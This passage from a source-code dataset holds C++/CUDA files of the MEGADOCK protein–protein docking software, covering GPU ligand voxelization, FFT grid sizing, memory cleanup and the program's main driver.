temp_top_index/nf2);\n\n _Select[0].score = temp_top_score;\n _Select[0].index[1] = temp_top_index / nf2;\n _Select[0].index[2] = (temp_top_index / nf1) % nf1;\n _Select[0].index[3] = temp_top_index % nf1;\n /* / DEBUG\n printf(\"TEST, %d\\n\", _Select[0].index[1]);\n if ( _Select[0].index[1] > nf1 ){\n printf(\" error, %d\\n\", _Select[0].index[1]);\n }*/\n\n }\n\n //*** score_sort ***********************************************************\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].index[0] = _Current_rot_angle_num;\n _Top[_Current_rot_angle_num*num_sort+i] = _Select[i];\n }\n\n //size_t devmem_use, devmem_free, devmem_total;\n //cudaMemGetInfo(&devmem_free, &devmem_total);\n //devmem_use = devmem_total - devmem_free;\n //printf(\" [GPU (%d) memory] Use : %10u (%4.1f%%), Free : %10u (%4.1f%%), Total : %10u\\n\",myid2,devmem_use,(float)(100*devmem_use/devmem_total), devmem_free, (float)(100*devmem_free/devmem_total), devmem_total);\n\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_5_fftprocess_score_sort += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n\n//============================================================================//\nvoid FFTProcessTable::ligand_voxelization_on_gpu(float *theta, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n\n const float delta = 1.0;\n const float surface = 1.0;\n const float grid_width = _parameter->grid_width;\n const int sr_half = (2.4 + grid_width - 0.01) / grid_width;\n const int sr = 2 * sr_half + 1;\n\n const int na = _ligand->num_atoms();\n const int nag = na * ng1;\n const int na_sr3 = na * sr * sr * sr;\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n\n const int nThreads = NUM_THREADS;\n //const int nBlocks_na = (na + (nThreads-1)) / nThreads;\n const int nBlocks_nag = (nag + (nThreads-1)) / nThreads;\n const int nBlocks_na_sr3 = (na_sr3 + (nThreads-1)) / nThreads;\n const int nBlocks_ng3 = (ng3 + (nThreads-1)) / nThreads;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n //*\n //transfer ligand angle & calc xd,yd,zd,atom_coord_rotated\n gettimeofday(&et3,NULL);\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(ligand_rotation_angle_gpu, theta, sizeof(float)*3, cudaMemcpyHostToDevice, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n //lig_rotation<<<nBlocks_na, nThreads, 0, _cuda_stream>>>(na, ligand_rotation_angle_gpu,atom_coord_orig_gpu, mole_center_coord_gpu, atom_coord_rotated_gpu);\n //checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n //lig_calc_dis_atomgrid<<<nBlocks_nag, nThreads, 0, _cuda_stream>>>(na, ng1, xd_gpu, yd_gpu, zd_gpu, grid_coord_gpu, atom_coord_rotated_gpu);\n //checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n ligvoxgpu_copy_htod<<<nBlocks_nag, nThreads, 0, _cuda_stream>>>\n (na, ligand_rotation_angle_gpu, ng1, atom_coord_orig_gpu, mole_center_coord_gpu, atom_coord_rotated_gpu, xd_gpu, yd_gpu, zd_gpu, grid_coord_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_1_ligvoxgpu_copy_htod += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //grid[] initialize\n gettimeofday(&et3,NULL);\n lig_vox_init<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(ng3,nf3,grid_r_gpu,grid_i_gpu,CUFFTin_gpu);\n //lig_vox_init_fft<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(nf3,CUFFTin_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_2_ligvoxgpu_kernel_init += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(core)\n gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads, 0, _cuda_stream>>>\n (ng1,na,delta,radius_core2_gpu,xd_gpu,yd_gpu,zd_gpu,grid_coord_gpu,atom_coord_rotated_gpu,grid_r_gpu, grid_width);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_3_ligvoxgpu_kernel_fill_core += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //surface cutting\n gettimeofday(&et3,NULL);\n lig_vox_surface_cut_CtoT<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1,delta,grid_r_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_4_ligvoxgpu_kernel_cut_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(surf)\n gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads, 0, _cuda_stream>>>\n (ng1,na,surface,radius_surf2_gpu,xd_gpu,yd_gpu,zd_gpu,grid_coord_gpu,atom_coord_rotated_gpu,grid_r_gpu, grid_width);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_5_ligvoxgpu_kernel_fill_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //electro\n gettimeofday(&et3,NULL);\n\n if(_parameter->lig_elec_serial_flag == 0) {\n lig_vox_elec<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1, na, grid_width, _Charge_gpu, atom_coord_rotated_gpu, grid_i_gpu);\n } else {\n lig_vox_elec_serial<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1, na, grid_width, _Charge_gpu, atom_coord_rotated_gpu, grid_i_gpu);\n }\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_6_ligvoxgpu_kernel_elec += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //set Voxel grid[ng3] into center of FFT grid[nf3]\n gettimeofday(&et3,NULL);\n ligand_voxel_set<<<nBlocks_ng3, nThreads, 0, _cuda_stream>>>(ng1,CUFFTin_gpu,grid_r_gpu,grid_i_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t3_1_7_ligvoxgpu_kernel_set_array += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n}\n\n\n//============================================================================//\nvoid FFTProcessTable::ligand_data_transfer_gpu(float *grid_coord)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int na = _ligand->num_atoms();\n const int num_gpu = _parallel->num_gpu();\n const int nproc2 = _parallel->nproc2();\n const float rcore2 = 1.5; // ZDOCK parameter\n const float rsurf2 = 1.0; // ZDOCK parameter\n struct timeval et1, et2;\n\n float radius_core2[na];\n float radius_surf2[na];\n\n for(int i = 0; i < na; i++) {\n radius_core2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rcore2;\n radius_surf2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rsurf2;\n }\n\n gettimeofday(&et1,NULL);\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n checkCudaErrors( cudaMemcpyAsync(radius_core2_gpu, radius_core2, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(radius_surf2_gpu, radius_surf2, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(_Charge_gpu, _ligand->_Charge, sizeof(float)*na, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(grid_coord_gpu, grid_coord, sizeof(float)*ng1, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(atom_coord_orig_gpu, _ligand->_Coordinate, sizeof(float)*na*3, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(mole_center_coord_gpu, _ligand->_Center, sizeof(float)*3, cudaMemcpyHostToDevice, _cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_lig += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n#endif /* CUFFT */\n\n\n\n//============================================================================//\nvoid FFTProcessTable::fft_memory_free()\n//============================================================================//\n{\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n\n#ifndef CUFFT\n fftwf_destroy_plan(plan_fftw_forward);\n fftwf_destroy_plan(plan_fftw_inverse);\n\n _exec_logger->record_free(sizeof(float)*nf3*2);\n\n#else\n\n //const int num_sort = _parameter->_Num_sort;\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n\n cufftDestroy(cufft_plan);\n\n checkCudaErrors( cudaStreamDestroy(_cuda_stream));\n\n checkCudaErrors( cudaFree(CUFFTin_gpu));\n checkCudaErrors( cudaFree(CUFFTout_gpu));\n checkCudaErrors( cudaFree(_FFT_rec_r_gpu));\n checkCudaErrors( cudaFree(_FFT_rec_i_gpu));\n\n\n checkCudaErrors( cudaFree(grid_r_gpu));\n checkCudaErrors( cudaFree(grid_i_gpu));\n checkCudaErrors( cudaFree(grid_coord_gpu));\n\n checkCudaErrors( cudaFree(radius_core2_gpu));\n checkCudaErrors( cudaFree(radius_surf2_gpu));\n checkCudaErrors( cudaFree(_Charge_gpu));\n\n checkCudaErrors( cudaFree(xd_gpu));\n checkCudaErrors( cudaFree(yd_gpu));\n\n checkCudaErrors( cudaFree(zd_gpu));\n\n checkCudaErrors( cudaFree(atom_coord_rotated_gpu));\n checkCudaErrors( cudaFree(atom_coord_orig_gpu));\n checkCudaErrors( cudaFree(mole_center_coord_gpu));\n checkCudaErrors( cudaFree(ligand_rotation_angle_gpu));\n\n checkCudaErrors( cudaFree(top_score_gpu));\n checkCudaErrors( cudaFree(top_index_gpu));\n\n delete [] top_score_host;\n delete [] top_index_host;\n\n\n _exec_logger->record_free( sizeof(float)*nBlocks_nf3 + sizeof(int)*nBlocks_nf3 );\n\n#endif\n\n return;\n}\n" }, { "alpha_fraction": 0.4765363037586212, "alphanum_fraction": 0.4975791573524475, "avg_line_length": 31.25225257873535, "blob_id": "7cfe16266b7743916e9e356fea646bd0e0a22398", "content_id": "a951b4b178960fb8bdb88e33c65b514a868e59ec", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10740, "license_type": "permissive", "max_line_length": 247, "num_lines": 333, "path": "/megadock-scfa20/control_pdb.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"control_pdb.h\"\n\n//============================================================================//\nvoid ControlPDB::initialize(int argc,char *argv[])\n//============================================================================//\n{\n int ngrid;\n vector<int> ngrid_table;\n\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n // ParameterPDB\n _parameter = new ParameterPDB(_parallel);\n _parameter->initialize(argc,argv);\n _cputime->record_malloc( sizeof(float)*_parameter->_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) ); //Rotation angles[], Atom radius, charge, ACE[]\n\n // Number of processors limitation\n const int thread_limit = _parameter->_Num_thread_limit;\n const int gpu_limit = _parameter->_Num_GPU_limit;\n\n if(_parallel->nproc2() > thread_limit) {\n _parallel->nproc2(thread_limit);\n }\n\n if(_parallel->num_gpu() > gpu_limit || _parallel->num_gpu() > _parallel->nproc2()) {\n _parallel->num_gpu( min(gpu_limit, (int)_parallel->nproc2()) );\n }\n printf(\"# Using %3d CPU cores, %d GPUs\\n\", _parallel->nproc2(), _parallel->num_gpu());\n\n // Receptor\n _receptor = new Receptor<ParameterPDB>(_parameter->_RecPDB_file);\n _receptor->initialize(_parameter);\n _cputime->record_malloc( sizeof(float)*_receptor->num_atoms()*3 ); //Atom coordinate\n\n // Ligand<ParameterPDB>\n _ligand = new Ligand<ParameterPDB>(_parameter->_LigPDB_file);\n _ligand->initialize(_parameter);\n _cputime->record_malloc( sizeof(float)*_ligand->num_atoms()*3 ); //Atom coordinate\n\n if( !_parameter->_Num_fft_flag ) {\n switch (_parameter->fft_base_set) {\n case 13:\n gridtable_13base_normal(ngrid,ngrid_table);\n break;\n case 7:\n gridtable_07base_normal(ngrid,ngrid_table);\n break;\n case 11:\n gridtable_11base_normal(ngrid,ngrid_table);\n break;\n case 0:\n gridtable_fftw_custom(ngrid,ngrid_table);\n break;\n case 1:\n gridtable_cufft_custom(ngrid,ngrid_table);\n break;\n }\n autogridr(ngrid,ngrid_table);\n autogridl(ngrid,ngrid_table);\n } else {\n checkgridr();\n checkgridl();\n }\n\n // DockingPDB\n _docking = new DockingPDB(_cputime,_parallel,_parameter,_receptor,_ligand);\n _docking->initialize();\n\n gettimeofday(&et2,NULL);\n _cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::autogridr(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size, size_rec = 0.0;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n \n //printf(\" %f, %f\\n\",_receptor->edge(i,1),_receptor->edge(i,0));\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n cout << \"\\nReceptor = \" << _receptor->input_file() << endl;\n cout << \"Receptor max size = \" << size_rec << endl;\n\n size_rec += 2.0 * _parameter->_Grid_space_rec;\n cout << \"Required voxel size = \" << size_rec << endl;\n\n num_grid = 1 + int(size_rec / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _receptor->num_grid(num_grid);\n\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::autogridl(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n\n cout << \"\\nLigand = \" << _ligand->input_file() << endl;\n cout << \"Ligand max size = \" << size_lig << endl;\n\n size_lig += 2.0 * _parameter->_Grid_space_lig;\n \n _parameter->ligand_max_edge = size_lig;\n\n cout << \"Required voxel size = \" << size_lig << endl;\n\n num_grid = 1 + int(size_lig / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _ligand->num_grid(num_grid);\n\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::checkgridr()\n//============================================================================//\n{\n float size, size_rec = 0.0;\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n cout << \"\\nReceptor max size = \" << size_rec << endl;\n\n size_rec += 2.0*_parameter->_Grid_space_rec;\n\n cout << \"Required voxel size = \" << size_rec << endl;\n\n if( size_rec > search_length ) {\n cerr << \"[ERROR] Receptor data is too big!!\\n\";\n exit(1);\n }\n\n _receptor->num_grid(num_grid);\n\n cout << \"\\n(Receptor)\\n\";\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n cout << \"Grid size = \" << _parameter->grid_width << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::checkgridl()\n//============================================================================//\n{\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n cout << \"\\nLigand max size = \" << size_lig << endl;\n\n size_lig += 2.0*_parameter->_Grid_space_lig;\n cout << \"Required voxel size = \" << size_lig << endl;\n\n if( size_lig > search_length ) {\n cerr << \"[ERROR] Ligand data is too big!!\\n\";\n exit(1);\n }\n\n _ligand->num_grid(num_grid);\n\n cout << \"\\n(Ligand)\\n\";\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n cout << \"Grid size = \" << _parameter->grid_width << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::execute()\n//============================================================================//\n{\n struct timeval et1, et2;\n\n cout << \"\\n---------- Start docking calculations\" << endl;\n\n gettimeofday(&et1,NULL); // Receptor process (voxelization, forward FFT of Receptor)\n _docking->rec_init();\n gettimeofday(&et2,NULL);\n _cputime->t2_receptor_process += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL); // docking\n _docking->dockz();\n gettimeofday(&et2,NULL);\n _cputime->t3_docking_total += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(_parameter->detail_output_flag == 1) { // detailed result output\n gettimeofday(&et1,NULL);\n _docking->output_detail();\n gettimeofday(&et2,NULL);\n _cputime->t4_docking_output_detail += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n }\n\n if(_parameter->calc_time_log_output_flag >= 1) { // calculation info\n _docking->output_calc_time_log();\n }\n\n gettimeofday(&et1,NULL); // normal result output\n _docking->output();\n gettimeofday(&et2,NULL);\n _cputime->t5_docking_output += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n _docking->dock_memory_free();\n\n const int ng1 = _parameter->_Num_grid;\n const int ng3 = ng1*ng1*ng1;\n const int nf1 = ng1*2;\n const int nf3 = nf1*nf1*nf1;\n const int nproc2 = _parallel->nproc2();\n const int natom = _parameter->_Num_atom_max;\n const int nag = natom * ng1;\n const size_t _Memfw = ng3*3+natom*3+nag*3;\n const size_t _Memiw = ng3*2+natom*4;\n\n //delete docking include delete fft_process, _FFT_rec_r/i[nf3], _FFTWin/out[nf3*nproc2]\n _cputime->record_free( sizeof(float)*nf3*2 + sizeof(fftwf_complex)*nf3*2*nproc2);\n#ifdef CUFFT\n _cputime->record_free( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n#endif\n _cputime->record_free( sizeof(float)*_Memfw*nproc2 + sizeof(int)*_Memiw*nproc2 ); //_F/Iwork\n delete _docking;\n _cputime->record_free( sizeof(float)*_ligand->num_atoms()*3 );\n delete _ligand;\n _cputime->record_free( sizeof(float)*_receptor->num_atoms()*3 );\n delete _receptor;\n _cputime->record_free( sizeof(float)*_parameter->_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) );\n delete _parameter;\n\n\n return;\n}\n" }, { "alpha_fraction": 0.47106310725212097, "alphanum_fraction": 0.4857412576675415, "avg_line_length": 30.332202911376953, "blob_id": "e63fbb355850b6340e2d67d4e352677d1d840d68", "content_id": "9a47df89442d913c6395a4016a8d94e6b9a5e0e4", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9538, "license_type": "permissive", "max_line_length": 130, "num_lines": 295, "path": "/megadock-scfa20/main.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\r\n * Copyright (C) 2019 Tokyo Institute of Technology\r\n */\r\n\r\n//============================================================================//\r\n//\r\n// Software Name : MEGADOCK\r\n//\r\n// Class Name : (main)\r\n//\r\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\r\n//\r\n//============================================================================//\r\n\r\n#include <string.h>\r\n#include \"cpu_time.h\"\r\n#include \"exec_logger.h\"\r\n#include \"control_pdb.h\"\r\n#include \"control_table.h\"\r\n\r\n#ifdef CUFFT\r\n#include <helper_cuda.h>\r\n#define VERSION \"4.1.0 for GPU & \"\r\n#else\r\n#define VERSION \"4.1.0 for CPU & \"\r\n#endif\r\n\r\n#ifdef MPI_DP\r\n#define VTEXT \"multiple nodes\"\r\n#else\r\n#define VTEXT \"single node\"\r\n#endif\r\n\r\n#define LASTUPDATED \"26 March, 2019\"\r\n\r\nstruct DockingPair {\r\n string rec_file, lig_file, out_file;\r\n DockingPair(string rec_file, string lig_file, string out_file) : rec_file(rec_file), lig_file(lig_file), out_file(out_file) {}\r\n};\r\n\r\n//============================================================================//\r\nvoid get_pair(string line, string &rec_file, string &lig_file, string &out_file)\r\n//============================================================================//\r\n{\r\n int first_tab_index = line.find_first_of('\\t');\r\n if (first_tab_index == string::npos) {\r\n cerr << \"[Error] Ligand is not specified.\" << endl;\r\n exit(1);\r\n }\r\n rec_file = line.substr(0, first_tab_index);\r\n\r\n int second_tab_index = line.find_last_of('\\t');\r\n if (first_tab_index == second_tab_index) {\r\n lig_file = line.substr(first_tab_index + 1, line.size() - 1 - first_tab_index);\r\n out_file = \"\";\r\n } else {\r\n lig_file = line.substr(first_tab_index + 1, second_tab_index - 1 - first_tab_index);\r\n out_file = line.substr(second_tab_index + 1, line.size() - 1 - second_tab_index);\r\n }\r\n}\r\n\r\n//============================================================================//\r\nvoid initialize(int argc, char *argv[], int &nproc2, int &device_count_gpu)\r\n//============================================================================//\r\n{\r\n cout << \" MEGADOCK ver. \"<< VERSION << VTEXT << endl;\r\n cout << \" [email protected] lastupdated: \" << LASTUPDATED << endl;\r\n cout << endl;\r\n\r\n#ifdef _OPENMP\r\n #pragma omp parallel\r\n {\r\n nproc2 = omp_get_num_threads();\r\n if(omp_get_thread_num() == 0) {\r\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\r\n }\r\n }\r\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\r\n#else\r\n nproc2 = 1;\r\n#endif //#ifdef _OPENMP\r\n\r\n#ifdef CUFFT\r\n int nogpu_flag = 0;\r\n for (int num = 0; num < (argc-1); ++num) {\r\n if(!strncmp(argv[num], \"-G\", 2)) {\r\n if(argv[num+1] != NULL) {\r\n if(atoi(argv[num+1]) == 0) {\r\n nogpu_flag = 1;\r\n }\r\n }\r\n }\r\n }\r\n\r\n if(nogpu_flag != 1) {\r\n checkCudaErrors( cudaGetDeviceCount(&device_count_gpu) );\r\n if (device_count_gpu == 0) {\r\n fprintf(stderr, \"GPU Error: no devices supporting CUDA.\\n\");\r\n exit(-1);\r\n }\r\n\r\n cudaDeviceProp deviceProp;\r\n checkCudaErrors( cudaGetDeviceProperties(&deviceProp, 0));\r\n if (deviceProp.major < 1) {\r\n fprintf(stderr, \"GPU Error: device does not support CUDA.\\n\");\r\n exit(-1);\r\n }\r\n\r\n cudaSetDeviceFlags(cudaDeviceMapHost);\r\n fprintf(stdout, \"# Using CUDA device %d: %s\\n\", 0, deviceProp.name);\r\n cudaSetDevice(0);\r\n //fprintf(stdout, \"# Init CUDA device OK.\\n\");\r\n\r\n int cufft_version;\r\n cufftGetVersion(&cufft_version);\r\n printf(\"# CUFFT version : %d\\n\", cufft_version);\r\n }\r\n\r\n printf(\"# Number of available [threads / GPUs] : [%d / %d]\\n\",nproc2,device_count_gpu);\r\n#endif\r\n}\r\n\r\n//============================================================================//\r\nvoid main_pdb(int argc, char *argv[])\r\n//============================================================================//\r\n{\r\n Parallel *_parallel;\r\n CPUTime *_cputime;\r\n ControlPDB *_control;\r\n\r\n struct timeval et1, et2;\r\n struct timeval et3, et4;\r\n int nproc2 = 0;\r\n int device_count_gpu = 0;\r\n\r\n gettimeofday(&et1,NULL);\r\n gettimeofday(&et3,NULL);\r\n\r\n initialize(argc, argv, nproc2, device_count_gpu);\r\n\r\n _cputime = new CPUTime();\r\n _cputime->initialize();\r\n\r\n _parallel = new Parallel(nproc2);\r\n _parallel->num_gpu(device_count_gpu); \r\n\r\n gettimeofday(&et4,NULL);\r\n _cputime->t1_initialize += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\r\n\r\n _control = new ControlPDB(_cputime,_parallel);\r\n _control->initialize(argc,argv);\r\n _control->execute();\r\n\r\n delete _control;\r\n delete _parallel;\r\n\r\n _cputime->output();\r\n\r\n delete _cputime;\r\n\r\n gettimeofday(&et2,NULL);\r\n\r\n const float elapsed_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n printf(\"Elapsed time = %8.2f sec.\\n\",elapsed_time);\r\n}\r\n\r\n//============================================================================//\r\nvoid main_table(int argc, char *argv[])\r\n//============================================================================//\r\n{\r\n struct timeval et3, et4;\r\n int nproc2 = 0;\r\n int device_count_gpu = 0;\r\n\r\n gettimeofday(&et3,NULL);\r\n\r\n initialize(argc, argv, nproc2, device_count_gpu);\r\n\r\n struct timeval et1[nproc2], et2[nproc2];\r\n\r\n Parallel *_parallels[nproc2];\r\n ExecLogger *_exec_loggers[nproc2];\r\n ControlTable *_controls[nproc2];\r\n ParameterTable *_parameters[nproc2];\r\n\r\n for (int i = 0; i < nproc2; i++) {\r\n _parallels[i] = new Parallel(nproc2);\r\n _parallels[i]->num_gpu(device_count_gpu);\r\n _exec_loggers[i] = new ExecLogger();\r\n\r\n // ParameterTable\r\n _parameters[i] = new ParameterTable(_parallels[i]);\r\n if (i == 0) {\r\n _parameters[i]->initialize(argc,argv);\r\n } else {\r\n _parameters[i]->initialize(_parameters[0]);\r\n }\r\n _exec_loggers[i]->record_malloc(_parameters[i]->allocate_size()); //Rotation angles[], Atom radius, charge, ACE[]\r\n\r\n _controls[i] = new ControlTable(_exec_loggers[i],_parallels[i],_parameters[i]);\r\n _controls[i]->initialize(i == 0);\r\n }\r\n\r\n\r\n ifstream input_stream(_controls[0]->input_file());\r\n if (!input_stream.is_open()) {\r\n cerr << \"Unable to open input file.\" << endl;\r\n exit(1);\r\n }\r\n string line;\r\n vector<DockingPair> pairs;\r\n while (getline(input_stream, line)) {\r\n string rec_file, lig_file, out_file;\r\n get_pair(line, rec_file, lig_file, out_file);\r\n pairs.push_back(DockingPair(rec_file, lig_file, out_file));\r\n }\r\n\r\n#pragma omp parallel for schedule(dynamic, 1)\r\n for (int i = 0; i < pairs.size(); i++) {\r\n int myid2 = omp_get_thread_num();\r\n DockingPair _docking_pair = pairs[i];\r\n gettimeofday(&et1[myid2],NULL);\r\n _exec_loggers[myid2]->initialize();\r\n#pragma omp critical (prepare)\r\n {\r\n 